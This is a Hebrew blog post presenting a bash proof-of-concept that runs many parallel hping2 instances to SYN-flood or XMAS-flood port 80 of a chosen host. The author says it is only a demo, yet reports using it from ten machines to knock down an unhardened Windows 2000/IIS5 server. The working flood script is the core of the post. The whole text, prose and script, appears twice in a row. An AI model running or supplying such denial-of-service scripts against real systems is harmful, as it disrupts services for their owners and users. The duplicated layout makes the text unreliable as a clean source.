POC לסקריפט - hping2 DOS
נשאלתי פעמים רבות כיצד ניתן ליצור בדיקות של SYNFLOOD או של התקפות XMAS על שרתים ועל ציודים , אך בעיקר על שרתי WEB שהם האפליקציה הוודאית אשר פתוחה לעולם ולכן בין הקריטיות שיעמדו בעומסי התקפה מסויימים. מובן שכיום רוב מרכות הIPS והFW כבר מס.וגלות לאתר את ההתקפות הללו ולהתמודד איתן בצורה יפה. אבל שוב , ביקשתם קיבלתם
מדובר כמובן על התקפות סופר מיושנות על שכבות התקשורת מול שירותים מסויימים , במקרה הזה נדגים על PORT 80 שהוא מבואת הגישה לפרוטוקול HTTP ( אלא אם שונה ) . לא ארחיב בנוגע לסוגי ההתקפות עצמן - אני יוצא מנקודת הנחה שהן מוכרות.
הסקריפט הבא מתבסס על כלי פשוט בשם HPING אשר מאפשר לייצר פאקטים משל עצמנו. אני בשביל להתכונן לבדיקה שכזו , מוודא גם שהמכונה שלי לא מסוגלת להחזיר ACK ( קצת עבודה עם IPTABLES ) אבל הלוגיקה פשוטה . שוב הכלי הוא POC בלבד , והוכן בשביל להראות לחבר איך נראית התקפה שכזו ומה ההשפעה ( הפלנו באמצעות התקפה עם 10 מחשבים , שרת 2000 לא מוקשח עם IIS5 עליו ).
#!/bin/bash
# note : you need hping2 package installed.
# usage: ./script IP/DOMAIN | METHOD | THREADS
# methods : 1 = synflood | 2 = xmas attack
# example : ./script domain.com 1 50 .
# this will produce a synflood on domain.com with 50 threads
i=1
while [ $i -le $3 ]
do
   if [ $2 -eq 1 ]
   then
     hping2 -S -p 80 $1 & #synflood
   else
     hping2 -X -f -p 80 $1 & #xmas
   fi
   i=`expr $i + 1` #increment counter
done
if [ $1 -eq 0 -a $2 -eq 0 -a $3 -eq 0 ] # use ./script 0 0 0 to kill attack
then
   killall hping2
fi
אין מאחורי המנוע משהו מתוחכם , מדובר בפעולה פשוטה ( ואפילו חובבנית ולא תמיד עובדת ) של סקריפט BASH. היתרון היחסי בדוגמא זו , הא שניתן לבין עד כמה פשוט לייצר כלים או סקריפטים תוצרת בית בכדי לבצע פעולות שונות , אפילו זדוניות - או לחליפין לייצר אוטומציה של תהליכים שכאלו.
מדובר כמובן על התקפות סופר מיושנות על שכבות התקשורת מול שירותים מסויימים , במקרה הזה נדגים על PORT 80 שהוא מבואת הגישה לפרוטוקול HTTP ( אלא אם שונה ) . לא ארחיב בנוגע לסוגי ההתקפות עצמן - אני יוצא מנקודת הנחה שהן מוכרות.
הסקריפט הבא מתבסס על כלי פשוט בשם HPING אשר מאפשר לייצר פאקטים משל עצמנו. אני בשביל להתכונן לבדיקה שכזו , מוודא גם שהמכונה שלי לא מסוגלת להחזיר ACK ( קצת עבודה עם IPTABLES ) אבל הלוגיקה פשוטה . שוב הכלי הוא POC בלבד , והוכן בשביל להראות לחבר איך נראית התקפה שכזו ומה ההשפעה ( הפלנו באמצעות התקפה עם 10 מחשבים , שרת 2000 לא מוקשח עם IIS5 עליו ).
#!/bin/bash
# note : you need hping2 package installed.
# usage: ./script IP/DOMAIN | METHOD | THREADS
# methods : 1 = synflood | 2 = xmas attack
# example : ./script domain.com 1 50 .
# this will produce a synflood on domain.com with 50 threads
i=1
while [ $i -le $3 ]
do
   if [ $2 -eq 1 ]
   then
     hping2 -S -p 80 $1 & #synflood
   else
     hping2 -X -f -p 80 $1 & #xmas
   fi
   i=`expr $i + 1` #increment counter
done
if [ $1 -eq 0 -a $2 -eq 0 -a $3 -eq 0 ] # use ./script 0 0 0 to kill attack
then
   killall hping2
fi
אין מאחורי המנוע משהו מתוחכם , מדובר בפעולה פשוטה ( ואפילו חובבנית ולא תמיד עובדת ) של סקריפט BASH. היתרון היחסי בדוגמא זו , הא שניתן לבין עד כמה פשוט לייצר כלים או סקריפטים תוצרת בית בכדי לבצע פעולות שונות , אפילו זדוניות - או לחליפין לייצר אוטומציה של תהליכים שכאלו.